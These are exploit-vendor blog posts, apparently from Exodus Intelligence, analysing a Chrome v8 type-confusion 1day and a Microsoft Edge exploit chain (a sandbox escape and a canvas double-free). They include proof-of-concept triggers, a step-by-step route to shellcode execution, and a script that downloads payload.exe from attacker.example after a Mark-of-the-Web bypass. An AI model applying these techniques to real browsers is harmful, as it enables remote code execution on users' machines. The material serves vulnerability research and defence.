Patch-gapping is the practice of exploiting vulnerabilities in open-source software that are already fixed (or are in the process of being fixed) by the developers before the patch is shipped to users. This window, in which the issue is semi-public while the user base remains vulnerable, can range from days to months. It is increasingly seen as a serious concern, with possible in-the-wild uses detected by Google. In a previous post, we demonstrated the feasibility of developing a 1day exploit for Chrome well before a patch is rolled out to users. In a similar vein, this post details the discovery, analysis and exploitation of another recent 1day vulnerability affecting Chrome.
Background
Besides analyzing published vulnerabilities, our nDay team also identifies possible security issues while the fixes are in development. An interesting change list on chromium-review piqued our interest in mid-August. It was for an issue affecting sealed and frozen objects, including a regression test that triggered a segmentation fault. It has been abandoned (and deleted) since then in favor of a different patch approach, with work continuing under CL 1760976, which is a much more involved change.
Since the fix turned out to be so complex, the temporary solution for the v8 7.7 branch was to disable the affected functionality. This will only be rolled into a stable release on the 10th of September, though. A similar change was made in the 7.6 branch, but it came two days after the stable channel update to 76.0.3809.132, so it wasn’t included in that release. As such, the latest stable Chrome release remains affected. These circumstances made the vulnerability an ideal candidate for developing a 1day exploit.
The commit message is descriptive: the issue is the result of the effects of Object.preventExtensions and Object.seal/freeze on the maps and element storage of objects, and of how incorrect map transitions are followed by v8 under some conditions. Since map handling in v8 is a complex topic, only the details necessary to understand the vulnerability will be discussed. More information on the relevant topics can be found under the following links:
JS engines implement several optimizations for the property storage of objects. A common technique is to use separate backing stores for the integer keys (often called elements) and the string/Symbol keys (usually referred to as slots or named properties). This allows the engines to potentially use contiguous arrays for properties with integer keys, where the index maps directly to the underlying storage, speeding up access. String-keyed values are also stored in an array, but to get the index corresponding to the key, another level of indirection is needed. This information, among other things, is provided by the map (or HiddenClass) of the object.
The storage of object shapes in a HiddenClass is another attempt at saving storage space. HiddenClasses are similar in concept to classes in object-oriented languages. However, since it is not possible to know the property configuration of objects in a prototype-based language like JavaScript in advance, they are created on demand. JS engines only create a single HiddenClass for a given shape, which is shared by every object that has the same structure. Adding a named property to an object results in the creation of a new HiddenClass, which contains the storage details for all the previous properties and the new one, then the map of the object is updated, as shown below (figures from the v8 dev blog).
These transitions are saved in a HiddenClass chain, which is consulted when new objects are created with the same named properties, or the properties are added in the same order. If there is a matching transition, it is reused, otherwise a new HiddenClass is created and added to the transition tree.
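The transition mechanism can be illustrated with a short model. The sketch below is a simplification for illustration only (the class and field names are ours, not v8's): objects that receive the same named properties in the same order end up sharing a single shape, while a different insertion order creates a new branch in the transition tree.

```javascript
// A simplified model of hidden classes (maps) and their transition tree.
// This is an illustrative sketch, not v8's actual implementation.
class Shape {
  constructor(parent, key) {
    this.parent = parent;
    this.key = key;
    // Offset of each known property in the object's storage.
    this.offsets = parent
      ? { ...parent.offsets, [key]: Object.keys(parent.offsets).length }
      : {};
    this.transitions = new Map(); // property key -> child Shape
  }
  // Follow an existing transition for `key`, or create a new one.
  addProperty(key) {
    if (!this.transitions.has(key)) {
      this.transitions.set(key, new Shape(this, key));
    }
    return this.transitions.get(key);
  }
}

const root = new Shape(null, null);

// Two objects that add properties in the same order share a shape.
const shapeA = root.addProperty('x').addProperty('y');
const shapeB = root.addProperty('x').addProperty('y');

// A different insertion order produces a different branch of the tree.
const shapeC = root.addProperty('y').addProperty('x');

console.log(shapeA === shapeB); // true: existing transition reused
console.log(shapeA === shapeC); // false: a new HiddenClass was created
```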
The properties themselves can be stored in three places. The fastest is in-object storage, which only needs a lookup for the key in the HiddenClass to find the index into the in-object storage space. This is limited to a certain number of properties; additional ones are stored in the so-called fast storage, which is a separate array pointed to by the properties member of the object, as shown below.
If an object has many properties added and deleted, maintaining the HiddenClasses can get expensive. V8 uses heuristics to detect such cases and migrates the object to a slow, dictionary-based property storage, as shown in the following diagram.
Another frequent optimization is to store the integer keyed elements in a dense or packed format, if they can all fit in a specific representation, e.g. small integer or float. This bypasses the usual value boxing in the engines, which stores numbers as pointers to Number objects, thus saving space and speeding up operations on the array. V8 handles several such element kinds, for example PACKED_SMI_ELEMENTS, which denotes an elements array with small integers stored contiguously. This storage format is tracked in the map of the object and needs to be kept up to date at all times to avoid type confusion issues. Element kinds are organized into a lattice; transitions are only ever allowed toward more general types. This means that adding a float value to an object with the PACKED_SMI_ELEMENTS elements kind will convert every value to double, set the newly added value and change the elements kind to PACKED_DOUBLE_ELEMENTS.
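The generalization rule can be sketched as follows. This is an illustrative model, not engine code; the kind names match v8's, but the lattice is reduced to three kinds:

```javascript
// Illustrative model of the element-kind lattice (simplified, not v8 code).
// Transitions may only move toward more general kinds, never back.
const GENERALITY = {
  PACKED_SMI_ELEMENTS: 0,
  PACKED_DOUBLE_ELEMENTS: 1,
  PACKED_ELEMENTS: 2, // arbitrary tagged values
};

function kindForValue(v) {
  if (Number.isInteger(v) && Math.abs(v) < 2 ** 30) return 'PACKED_SMI_ELEMENTS';
  if (typeof v === 'number') return 'PACKED_DOUBLE_ELEMENTS';
  return 'PACKED_ELEMENTS';
}

// Adding a value can only keep or generalize the current kind.
function transition(currentKind, value) {
  const needed = kindForValue(value);
  return GENERALITY[needed] > GENERALITY[currentKind] ? needed : currentKind;
}

let kind = 'PACKED_SMI_ELEMENTS';
kind = transition(kind, 3);   // stays PACKED_SMI_ELEMENTS
kind = transition(kind, 4.5); // generalizes to PACKED_DOUBLE_ELEMENTS
kind = transition(kind, 7);   // stays PACKED_DOUBLE_ELEMENTS: no narrowing
console.log(kind); // "PACKED_DOUBLE_ELEMENTS"
```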
preventExtensions, seal and freeze
JavaScript provides several ways to fix the set of properties on an object.
Object.preventExtensions: prevents new properties from being added to the object.
Object.seal: prevents the addition of new properties, as well as the reconfiguration of existing ones (changing their writable, enumerable or configurable attributes).
Object.freeze: the same as Object.seal but also prevents changing property values, thus effectively prohibiting any change to the object.
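The observable behavior of the three operations can be demonstrated directly in JavaScript:

```javascript
'use strict'; // in strict mode, violations throw instead of failing silently

const a = { x: 1 };
Object.preventExtensions(a);
try { a.y = 2; } catch (e) { /* TypeError: cannot add property */ }
a.x = 10;   // still allowed: existing properties remain writable
delete a.x; // still allowed: existing properties remain configurable

const b = { x: 1 };
Object.seal(b);
b.x = 10;   // allowed: values stay writable
try { delete b.x; } catch (e) { /* TypeError: property is non-configurable */ }

const c = { x: 1 };
Object.freeze(c);
try { c.x = 10; } catch (e) { /* TypeError: property is read-only */ }

console.log(Object.isExtensible(a), Object.isSealed(b), Object.isFrozen(c));
// false true true
```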
PoC analysis
The vulnerability arises because v8 follows map transitions in certain cases without updating the element backing store accordingly, which can have wide-ranging consequences. A modified trigger with comments is shown below.
// Based on test/mjsunit/regress/regress-crbug-992914.js
function mainSeal() {
const a = {foo: 1.1}; // a has map M1
Object.seal(a); // a transitions from M1 to M2 Map(HOLEY_SEALED_ELEMENTS)
const b = {foo: 2.2}; // b has map M1
Object.preventExtensions(b); // b transitions from M1 to M3 Map(DICTIONARY_ELEMENTS)
Object.seal(b); // b transitions from M3 to M4
const c = {foo: Object} // c has map M5, which has a tagged `foo` property, causing the maps of `a` and `b` to be deprecated
b.__proto__ = 0; // property assignment forces migration of b from deprecated M4 to M6
a[5] = 1; // forces migration of a from the deprecated M2 map, v8 incorrectly uses M6 as new map without converting the backing store. M6 has DICTIONARY_ELEMENTS while the backing store remained unconverted.
}
mainSeal();
In the proof-of-concept code, two objects, a and b, are created with the same initial layout; then a is sealed, and Object.preventExtensions and Object.seal are called on b. This causes a to switch to a map with the HOLEY_SEALED_ELEMENTS elements kind, while b is migrated to slow property storage via a map with the DICTIONARY_ELEMENTS elements kind.
The vulnerability is triggered by the last three statements. The creation of object c with an incompatibly typed foo property causes a new map with a tagged foo property to be created for c, and the maps of a and b are marked deprecated. This means that they will be migrated to a new map on the next property set operation. The assignment to b.__proto__ triggers the transition for b, and the element store a[5] = 1 triggers it for a. The issue is that v8 mistakenly assumes that a can be migrated to the same map as b but fails to also convert the backing store. This causes a type confusion between a FixedArray (the Properties array shown in the Object Layout In v8 section) and a NumberDictionary (the Properties Dict).
A type confusion the other way around is also possible, as demonstrated by another regression test in the patch. There are probably also other ways this invalid map transition could be turned into an exploitable primitive, for example by breaking assumptions made by the optimizing JIT compiler.
Exploitation
The vulnerability can be turned into an arbitrary read/write primitive by using the type confusion shown above to corrupt the length of an Array, then using that Array for further corruption of TypedArrays. These can then be leveraged to achieve arbitrary code execution in the renderer process.
FixedArray and NumberDictionary Memory Layout
FixedArray is the C++ class used for the backing store of several different JavaScript objects. It has a simple layout, shown below, with only a map pointer, a length field stored as a v8 small integer (essentially a 31-bit integer left-shifted by 32), then the elements themselves.
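The small integer encoding can be modeled with BigInt arithmetic. The sketch below assumes the pre-pointer-compression 64-bit representation described above, where the payload occupies the upper 32 bits and the low tag bit distinguishes immediates from heap pointers:

```javascript
// Sketch of v8's 64-bit Smi tagging, modeled with BigInt (illustrative).
// The integer payload is shifted into the upper 32 bits; a HeapObject
// pointer has its low bit set to 1, so the two are told apart by the tag.
function smiEncode(n) {
  return BigInt(n) << 32n;
}
function smiDecode(word) {
  return Number(BigInt.asIntN(32, word >> 32n));
}
function isSmi(word) {
  return (word & 1n) === 0n; // heap pointers carry a 1 in the low bit
}

const w = smiEncode(0x4141);
console.log(w.toString(16)); // "414100000000"
console.log(smiDecode(w));   // 16705 (0x4141)
console.log(isSmi(w));       // true
```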
The NumberDictionary class implements an integer keyed hash table on top of FixedArray. Its layout is shown below. It has four additional members besides map and length:
elements: the number of elements stored in the dictionary.
deleted: number of deleted elements.
capacity: number of elements that can be stored in the dictionary. The length of the FixedArray backing a number dictionary will be three times its capacity plus the extra header members of the dictionary (four).
max number key index: the greatest key stored in the dictionary.
Elements in a NumberDictionary are stored as three slots in the underlying FixedArray. For example, the element with the key 0 starts at 0x2d7782c4bf10 above. First comes the key, then the value (in this case a small integer holding 0x4141), then the PropertyDescriptor denoting the configurable, writable and enumerable attributes of the property. The 0xc000000000 PropertyDescriptor corresponds to all three attributes being set.
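The layout described above can be modeled as follows. The field order and names are a simplification based on the description, not v8 source:

```javascript
// Sketch of how a NumberDictionary lays out its entries in the backing
// FixedArray (field order simplified from the description above).
const HEADER = ['elements', 'deleted', 'capacity', 'maxNumberKeyIndex'];
const ENTRY_SIZE = 3; // key, value, property details per entry

function entryOffset(entryIndex) {
  // Offset of an entry's key slot within the FixedArray data area.
  return HEADER.length + entryIndex * ENTRY_SIZE;
}

// A dictionary with capacity 4 holding one element: key 0 -> 0x4141.
const capacity = 4;
const backing = new Array(HEADER.length + capacity * ENTRY_SIZE).fill(undefined);
backing[0] = 1;        // elements: one entry in use
backing[1] = 0;        // deleted
backing[2] = capacity; // capacity
backing[3] = 0;        // max number key index

const off = entryOffset(0);
backing[off] = 0;          // key
backing[off + 1] = 0x4141; // value
backing[off + 2] = 'wec';  // stand-in for the PropertyDescriptor slot

console.log(backing.length); // 16: 4 header slots + 4 entries * 3 slots
```

With the type confusion, a plain FixedArray whose first few elements the attacker controls is reinterpreted with exactly this layout, which is what makes the header fields attacker-chosen.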
The vulnerability makes all header fields of a NumberDictionary, except length, controllable by setting them to arbitrary values in a plain FixedArray, then treating them as header fields of a NumberDictionary by triggering the issue. While the type confusion can also be triggered in the other direction, it did not yield any immediately promising primitives. Further type confusions can also be caused by setting up a fake PropertyDescriptor to confuse a data property with an accessor property but these also proved too limited and were abandoned.
The capacity field is the most interesting from an exploitation perspective, since it is used in most bounds calculations. When attempting to set, get or delete an element, the HashTable::FindEntry function is used to get the location of the element corresponding to the key. Its code is shown below.
// Find entry for key otherwise return kNotFound.
template <typename Derived, typename Shape>
int HashTable<Derived, Shape>::FindEntry(ReadOnlyRoots roots, Key key,
                                         int32_t hash) {
  uint32_t capacity = Capacity();
  uint32_t entry = FirstProbe(hash, capacity);
  uint32_t count = 1;
  // EnsureCapacity will guarantee the hash table is never full.
  Object undefined = roots.undefined_value();
  Object the_hole = roots.the_hole_value();
  USE(the_hole);
  while (true) {
    Object element = KeyAt(entry);
    // Empty entry. Uses raw unchecked accessors because it is called by the
    // string table during bootstrapping.
    if (element == undefined) break;
    if (!(Shape::kNeedsHoleCheck && the_hole == element)) {
      if (Shape::IsMatch(key, element)) return entry;
    }
    entry = NextProbe(entry, count++, capacity);
  }
  return kNotFound;
}
The hash tables in v8 use quadratic probing with a randomized hash seed. This means that the hash argument in the code, and thus the exact layout of dictionaries in memory, will change from run to run. The FirstProbe and NextProbe functions, shown below, are used to look for the location where the value is stored. Their size argument is the capacity of the dictionary and is thus attacker-controlled.
Capacity is a power-of-two number under normal conditions, and masking the probes with capacity-1 limits the range of accesses to in-bounds values. However, setting the capacity to a larger value via the type confusion will result in out-of-bounds accesses. The issue with this approach is the random hash seed, which will cause probes, and thus out-of-bounds accesses, to land at random offsets. This can easily result in crashes, as v8 will try to interpret any odd value as a tagged pointer.
A possible solution is to set capacity to an out-of-bounds number k that is a power-of-two plus one. This causes the FindEntry algorithm to only visit two possible locations, one at offset zero, and one at offset k (times three). With careful padding, a target Array can be placed following the dictionary, which has its length property at just that offset. Invoking a delete operation on the dictionary with a key that is the same as the length of the target Array will cause the algorithm to replace the length with the hole value. The hole is a valid pointer to a static object, in effect a large value, allowing the target Array to be used for more convenient, array-based out-of-bounds read and write operations.
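The effect of the masking can be reproduced with a short simulation. The probe formulas below follow the scheme described above (first probe hash & (capacity-1), subsequent probes offset by an increasing count); the constants are illustrative:

```javascript
// Simulation of the probe sequence of HashTable::FindEntry, to show why a
// confused capacity of 2**k + 1 confines probes to exactly two entry indexes.
function probeSequence(hash, capacity, probes) {
  const mask = capacity - 1;
  const seen = new Set();
  let entry = hash & mask;          // FirstProbe
  for (let count = 1; count <= probes; count++) {
    seen.add(entry);
    entry = (entry + count) & mask; // NextProbe (quadratic probing)
  }
  return seen;
}

// Normal case: a power-of-two capacity keeps probes in bounds, spread out.
const normal = probeSequence(0xdeadbeef, 16, 100);

// Confused case: capacity = 2**4 + 1 = 17, so the mask is 0b10000 and every
// probe lands at entry 0 or entry 16 -- a fixed out-of-bounds offset,
// independent of the randomized hash seed.
const confused = probeSequence(Math.floor(Math.random() * 2 ** 32), 17, 100);

console.log([...confused].sort((x, y) => x - y)); // [ 0, 16 ]
```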
While this method can work, it is nondeterministic due to the randomization and the degraded nature of the corrupted NumberDictionary. However, failure does not crash Chrome and is easily detectable; reloading the page reinitializes the hash seed so the exploit can be attempted an arbitrary number of times.
Arbitrary Code Execution
The following object layout is used to gain arbitrary read/write access to the process memory space:
o: the object that will be used to trigger the vulnerability.
padding: an Array that is used as padding to get the target float array at exactly the right offset from o.
float_array: the Array that is the target of the initial length corruption via the out-of-bounds element deletion on o.
tarr: a TypedArray used to corrupt the next typed array.
aarw_tarr: typed array used for arbitrary memory access.
obj_addrof: object used to implement the addrof primitive which leaks the address of an arbitrary JavaScript object.
The exploit achieves code execution by following the usual steps after the initial corruption:
Create the layout described above.
Trigger the vulnerability, corrupt the length of float_array through the deletion of a property on o. Restart the exploit by reloading the page in case this step fails.
Corrupt the length of tarr to increase reliability, since continued usage of the corrupted float array can introduce problems.
Corrupt the backing store of aarw_tarr and use it to gain arbitrary read write access to the address space.
Load a WebAssembly module. This maps a read-write-executable memory region of 4KiB into the address space.
Traverse the JSFunction object hierarchy of an exported function from the WebAssembly module using the arbitrary read/write primitive to find the address of the read-write-executable region.
Replace the code of the WebAssembly function with shellcode and execute it by invoking the function.
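Step 5 and the final invocation can be sketched as follows. The module below is a minimal hand-assembled WebAssembly binary exporting a single function (the export name main is our choice); the object traversal and shellcode-writing steps require the corrupted read/write primitives and are omitted:

```javascript
// Minimal WebAssembly module used as a code-execution springboard (step 5).
// The module exports one function returning 42; in the exploit, the
// JSFunction for the export is the starting point for locating the
// read-write-executable code region.
const wasmBytes = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, // magic + version
  0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f,       // type section: () -> i32
  0x03, 0x02, 0x01, 0x00,                         // function section: type 0
  0x07, 0x08, 0x01, 0x04, 0x6d, 0x61, 0x69, 0x6e, // export section: "main"
  0x00, 0x00,
  0x0a, 0x06, 0x01, 0x04, 0x00, 0x41, 0x2a, 0x0b, // code: i32.const 42; end
]);

const instance = new WebAssembly.Instance(new WebAssembly.Module(wasmBytes));
console.log(instance.exports.main()); // 42
```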
The complete exploit code can be found on our GitHub page and seen in action below. Note that a separate vulnerability would be needed to escape the sandbox employed by Chrome.
Detection
The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.
Mitigation
Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.
Conclusion
Subscribers of our nDay feed had access to the analysis and functional exploit 5 working days after the initial patch attempt appeared on chromium-review. A fix in the stable channel of Chrome will only appear in version 77, scheduled to be released tomorrow.
Malicious actors probably have capabilities based on patch-gapping. Timely analysis of such vulnerabilities allows our customers to test how their defensive measures hold up against unpatched security issues. It also enables offensive teams to test the detection and response functions within their organization.
This is the second part of the blog post on the Microsoft Edge full-chain exploit. It provides an analysis and describes the exploitation of a logical vulnerability in the implementation of the Microsoft Edge browser sandbox, which allows arbitrary code execution with Medium Integrity Level.
Background
Microsoft Edge employs various Inter-Process Communication (IPC) mechanisms to communicate between content processes, the Manager process and broker processes. The one IPC mechanism relevant to the described vulnerability is implemented as a set of custom message passing functions which extend the standard Windows API PostMessage() function. These functions look like the following:
The listed functions are used to send messages with or without data and are stateless. No direct way to get the result of an operation is supported. The functions return only the result of the message posting operation, which does not guarantee that the requested action has completed successfully. The main purpose of these functions is to trigger certain events (e.g. when a user clicks on the navigation panel), to signal state information, and to notify of user interface changes.
Messages are sent to the windows of the current process or the windows of the Manager process. A call to PostMessage() is chosen when the message is sent to the current process. For the inter-process messaging a shared memory section and Windows events are employed. The implementation details are hidden from the developer and the direction of the message is chosen based on the value of the window handle. Each message has a unique identifier which denotes the kind of action to perform as a response to the trigger.
Messages that are supposed to be created as a reaction to a user triggered event are passed from one function to another through the virtual layer of different handlers. These handlers process the message and may pass the message further with a different message identifier.
The Vulnerability
The Microsoft Edge Manager process accepts messages from other processes, including content processes. Some messages are meant to be used only internally, without crossing process boundaries, yet a content process can send messages which are supposed to be sent only within the Manager process. If such a message arrives from a content process, it is possible to forge user clicks and thus download and launch an arbitrary binary.
When the download of an executable file is initiated (either by JavaScript code or by user request), a notification bar with buttons appears and the user is offered three options: “Run” to run the offered file, “Download” to download it, or “Cancel” to cancel. If the user clicks “Run”, a series of messages is posted from one Manager process window to another. It is possible to see what kind of messages are passed in the debugger by using the following breakpoints:
bu edgeIso!LCIEPostMessage ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!LCIEPostMessageWithoutBuffer ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!LCIEPostMessageWithDISPPARAMS ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!IsoPostMessage ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!IsoPostMessageWithoutBuffer ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
bu edgeIso!IsoPostMessageUsingVirtualAddress ".printf \"\\n---\\n%y(%08x, %08x, %08x, ...)\\n\", @rip, @rcx, @rdx, @r8; k L10; g"
There are a large number of messages sent during the navigation and the subsequent file download, forming a complex sequence of actions. The following list is a simplified description of the actions performed by either a content process (CP) or the Manager process (MP) during ordinary user activities:
a user clicks on a link to navigate (or the navigation is triggered by JavaScript code)
a navigation event is fired (messages sent from CP to MP)
messages for the modal download notification bar creation and handling are sent (CP to MP)
the modal notification bar appears
messages to handle the navigation and the state of the history are sent (CP to MP)
messages are sent to handle DOM events (CP to MP)
the download is handled again; messages with relevant download information are passed (CP to MP)
the user clicks “Run” to run the file download
messages are sent about the state of the download (MP to CP)
the CP responds with updated file download information and terminates download handling in its own process
the MP picks up file download handling and starts sending messages to its own windows (MP to MP)
the MP starts the security scan of the downloaded file (MP to MP)
if the scan has completed successfully, a message is sent to the broker process to run the file
the “browser_broker.exe” broker process launches the executable file
The first message in the series of calls is the response to the user’s click, and it initiates the actual series of message passing events. Next follows a message which is important for the exploit, because its call stack includes the function which the exploit will imitate. An excerpt of the debugger log looks like the following:
The last message sent is important as well: it has the identifier 0xd6b and it initiates running the file. An excerpt of the debugger log looks like the following:
The message sent by SpartanCore::DownloadsHandler::SendCommand() is spoofed by the exploit code.
Exploit Development
The exploit code is implemented entirely in JavaScript and invokes the required native functionality from JavaScript.
The exploitation process can be divided into the following stages:
changing the location origin of the current document
executing the JavaScript code which offers to run the downloaded file
posting a message to the Manager process which triggers the file to be run
restoring the original location
Depending on the location of the site, the Edge browser may warn the user about a potentially unsafe file download. In the case of internet sites, the user is always warned. The Edge browser also checks the referrer of the download and may refuse to run the downloaded file even when the user has explicitly chosen to run it. Additionally, the downloaded file is scanned with Microsoft Windows Defender SmartScreen, which blocks any file from running if the file is considered malicious. These checks prevent a successful attack.
However, when a download is initiated from a “file://” URL and the download referrer is also from the secure zone (or without a zone, as is the case with the “blob:” protocol), the downloaded file is not marked with the “Mark of the Web” (MotW). This completely bypasses the Microsoft Defender SmartScreen checks and allows running the downloaded file without any restrictions.
For the first step the exploit finds the current site URL and overwrites it with a “file:///” zone URL. The URL of the site is found by reading relevant pointers in memory. After the site URL is overwritten, the renderer process treats any download that is coming from the current site as coming from the “file:///” zone.
For the second step the exploit executes the JavaScript code which fetches the download file from the remote server and offers it as a download:
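A download of this kind can be triggered from script roughly as shown below. This is a generic browser-side sketch using standard web APIs, not the original exploit code; the server URL and filename are placeholders:

```javascript
// Generic sketch of a script-initiated download (browser-only code).
// The URL and filename are illustrative placeholders.
async function offerDownload() {
  const response = await fetch('https://attacker.example/payload.exe');
  const blob = await response.blob();
  // A "blob:" URL carries no zone information, which matters for the
  // Mark-of-the-Web logic described earlier.
  const url = URL.createObjectURL(blob);
  const link = document.createElement('a');
  link.href = url;
  link.download = 'payload.exe';
  document.body.appendChild(link);
  link.click(); // triggers the download notification bar
}
```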
The executed JavaScript initiates the file download and internally the Edge browser caches the file and keeps a temporary copy as long as the user has not responded to the download notification bar. Before any file download, a Globally Unique Identifier (GUID) is created for the actual download file. The Edge browser recognizes downloads not by the filename or the path, but by the download GUID. Messages which send commands to do any file operation must pass the GUID of the actual file. Therefore it is required to find the actual file download GUID. The required GUID is created by the content process during the call to EdgeContent!CDownloadState::Initialize():
.text:0000000180058CF0 public: long CDownloadState::Initialize(class CInterThreadMarshal *, struct IStream *, unsigned short const *, struct _GUID const &, unsigned short const *, struct IFetchDownloadContext *) proc near
...
.text:0000000180058E6F loc_180058E6F:
.text:0000000180058E6F mov edi, 8007000Eh
.text:0000000180058E74 test rbx, rbx
.text:0000000180058E77 jz loc_180058FF0
.text:0000000180058E7D test r13b, r13b
.text:0000000180058E80 jnz short loc_180058E93
.text:0000000180058E82 lea rcx, [rsi+74h] ; pguid
.text:0000000180058E86 call cs:__imp_CoCreateGuid
Next follows the call to EdgeContent!DownloadStateProgress::LCIESendToDownloadManager(). This function packs all the relevant download data (such as the current URL, the path to the cache file, the referrer, the name of the file, and the mime type of the file), adds padding for the metadata, creates the so-called “message buffer” and sends it to the Manager process via a call to LCIEPostMessage(). As this message is posted to another process, all the data is eventually placed in the shared memory section and is available for reading and writing by both the content and Manager processes. The message buffer is eventually populated with the download file GUID.
The described operation performed by DownloadStateProgress::LCIESendToDownloadManager() is important for the exploit as it indirectly leaks the address of the message buffer and the relevant download file GUID.
The allocation address of the message buffer depends on the size of the message. There are several ranges of sizes:
0x0 to 0x20 bytes: unsupported (message posting fails)
0x20 to 0x1d0 bytes: first slot
0x1d4 to 0xfd0 bytes: second slot
from 0x1fd4 bytes: last slot
If the previous message in the same size slot was freed, the new message is allocated at the same address. These specifics of the message buffer allocator allow leaking the address of the next buffer without the risk of failure. After the file download is triggered, the exploit retrieves the address of the message buffer; it is then possible to parse the message buffer and extract the relevant data (such as the cache path and the file download GUID).
The last important step is to send a message which triggers the browser to run the downloaded file (the actual file operation is performed by the browser broker “browser_broker.exe”) with Medium Integrity Level. The exploit code which performs the current step is borrowed from eModel!TFlatIsoMessage<DownloadOperation>::Post():
__int64 __fastcall TFlatIsoMessage<DownloadOperation>::Post(
        unsigned int a1,
        unsigned int a2,
        __int64 a3,
        __int64 a4,
        __int64 a5)
{
    unsigned int v5; // esi
    unsigned int v6; // edi
    signed int result; // ebx
    __int64 isoMessage_; // r8
    __m128i threadStateGUID; // xmm0
    unsigned int v11; // [rsp+20h] [rbp-48h]
    __int128 tmpThreadStateGUID; // [rsp+30h] [rbp-38h]
    __int64 isoMessage; // [rsp+40h] [rbp-28h]
    unsigned int msgBuffer; // [rsp+48h] [rbp-20h]

    v5 = a2;
    v6 = a1;
    result = IsoAllocMessageBuffer(a1, &msgBuffer, 0x48u, &isoMessage);
    if ( result >= 0 )
    {
        isoMessage_ = isoMessage;
        *(isoMessage + 0x20) = *a5;
        *(isoMessage_ + 0x30) = *(a5 + 0x10);
        *(isoMessage_ + 0x40) = *(a5 + 0x20);
        threadStateGUID = *GlobalThreadState();
        v11 = msgBuffer;
        _mm_storeu_si128(&tmpThreadStateGUID, threadStateGUID);
        result = IsoPostMessage(v6, v5, 0xD6Bu, 0, v11, &tmpThreadStateGUID);
        if ( result < 0 )
        {
            IsoFreeMessageBuffer(msgBuffer);
        }
    }
    return result;
}
Last, the exploit recovers the original site URL to avoid any potential artifacts and sends messages to remove the download notification bar.
Open problems
The only issue with the exploit is that a small popup appears for a split second before the exploit sends a message to click the popup button. It is potentially possible to avoid this popup by sending a different set of messages which does not require a popup to be present.
Detection
There are no trivial methods to detect exploitation of the described vulnerability, as the exploit code does not rely on any particularly notable data and does not perform any kind of exceptional activity.
Mitigation
The exploit is developed in JavaScript, but it is possible to develop an exploit that is not based on JavaScript, which makes it non-trivial to mitigate the issue with 100% certainty.
For exploits developed in JavaScript, it is possible to mitigate this issue by disabling JavaScript.
The sandbox escape exploit part is 100% reliable and portable—thus requiring almost no effort to keep it compatible with different browser versions.
Here is the video demonstrating the full exploit-chain in action:
For demonstration purposes, the exploit payload writes a file named “w00t.txt” to the user desktop, opens this file with notepad and shows a message box with the integrity level of the “payload.exe”.
Subscribers of the Exodus 0day Feed had access to this exploit for penetration tests and implementing protections for their stakeholders.
This year Exodus Intelligence participated in the Pwn2Own competition in Vancouver. The chosen target was the Microsoft Edge browser and a full-chain browser exploit was successfully demonstrated. The exploit consisted of two parts:
a double-free vulnerability exploit achieving arbitrary code execution in the renderer process
a logical vulnerability sandbox escape exploit achieving arbitrary code execution with Medium Integrity Level
This blog post describes the exploitation of the double-free vulnerability in the renderer process of Microsoft Edge 64-bit. Part 2 will describe the sandbox escape vulnerability.
The Vulnerability
The vulnerability is located in the Canvas 2D API component which is responsible for creating canvas patterns. The crash is triggered with the following JavaScript code:
let canvas = document.createElement('canvas');
let ctx = canvas.getContext('2d');
// Allocate canvas pattern objects and populate hash table.
for (let i = 0; i < 31; i++) {
ctx.createPattern(canvas, 'no-repeat');
}
// Here the canvas pattern objects will be freed.
gc();
// This causes an internal OOM error.
canvas.setAttribute('height', 0x4000);
canvas.setAttribute('width', 0x4000);
// This will partially initialize the canvas pattern object and trigger the double-free.
try {
ctx.createPattern(canvas, 'no-repeat');
} catch (e) {
}
If you run this test case, you may notice that the crash does not always happen; several attempts may be required. One of the following sections explains why.
With the page heap enabled, the crash would look like this:
On line 21 the heap manager allocates space for the canvas pattern object and on the following lines certain members are set to 0. It is important to note the CCanvasPattern::Data member is populated on line 28.
Next follows a call to the CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget() method which is responsible for video memory allocation for the canvas pattern object on a target device. In certain cases this method returns an error. For the given vulnerability the bug is triggered when Windows GDI D3DKMTCreateAllocation() returns the error STATUS_GRAPHICS_NO_VIDEO_MEMORY (error code 0xc01e0100). Setting width and height of the canvas object to huge values can cause the video device to return an out-of-memory error. The following call stack shows the path which is taken after the width and height of the canvas object have been set to the large values and after consecutive calls to createPattern():
A requirement to trigger the error is that the target hardware has an integrated video card or a video card with little memory. Such conditions are met on the VMware graphics pseudo-hardware or on some budget devices. It is potentially possible to trigger other errors which do not depend on the target hardware resources as well.
Under normal conditions (i.e. the call to CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget() method does not return any error) the CCanvasPattern::Initialize() method is called:
On line 40 one of the canvas pattern object members is set to point to the CCanvasPattern::Data object.
During the call to the CCanvasPattern::InitializeFromCanvas() method, a chain of calls follows. This eventually leads to a call of the following method:
The above method adds a display resource to the cache. In the current case, the display resource is the DXImageRenderTarget object and the cache is a hash table which is implemented in the TDispResourceCache class.
On line 32 the call to the TDispResourceCache<CDispNoLock,1,0>::Add() method happens:
On line 27 the vulnerable object is allocated. It is important to note that the object is not allocated through the MemGC mechanism.
The hash table entries consist of key-value pairs. The key is a CCanvasPattern::Data object and the value is a DXImageRenderTarget. The initial size of the hash table allows it to hold up to 29 entries; however, there is space for 37 entries. The extra entries are there to reduce the number of possible hash collisions. A hash function is applied to each key to derive its position in the hash table. When the hash table is full, the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::Grow() method is called to increase the capacity of the hash table. During this call, key-value pairs are moved to their new indexes and the keys are removed from the previous positions, but the values remain. If, after the growth, a key-value pair has to be removed (e.g. a canvas pattern object is freed), the value is freed and the key-value pair is removed only from the new position.
